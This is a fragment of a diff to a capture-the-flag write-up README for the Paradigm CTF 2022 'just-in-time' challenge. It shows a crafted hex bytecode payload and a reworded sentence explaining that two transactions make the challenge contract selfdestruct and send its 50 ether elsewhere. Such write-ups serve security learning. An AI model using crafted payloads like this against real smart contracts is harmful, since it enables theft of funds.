meppent/paradigm-ctf-2022-writeup/just-in-time/README.md

 0x60006180005b5b5b5b5b5b5b8051630000001a57630000004a565bdead64beef8051615bff0181525b80516300000037576300000043565bdeadffbeef6300000028565b630000000b565b5b5b5b5b5b5b5b5b5b5b5b5b5b5b5b80516300000068576300000038565b5b5b5b5b5b5b5b00
 ```

-By executing the two transactions in a row, the contract will selfdestruct and send all of his money, the 50 ethers, to some address.
+By executing the two transactions in a row, the contract will selfdestruct and send all of his funds, the 50 ethers, to some address.
 We can deploy [`Solution.sol`](Solution.sol) that solves the challenge at the deployment.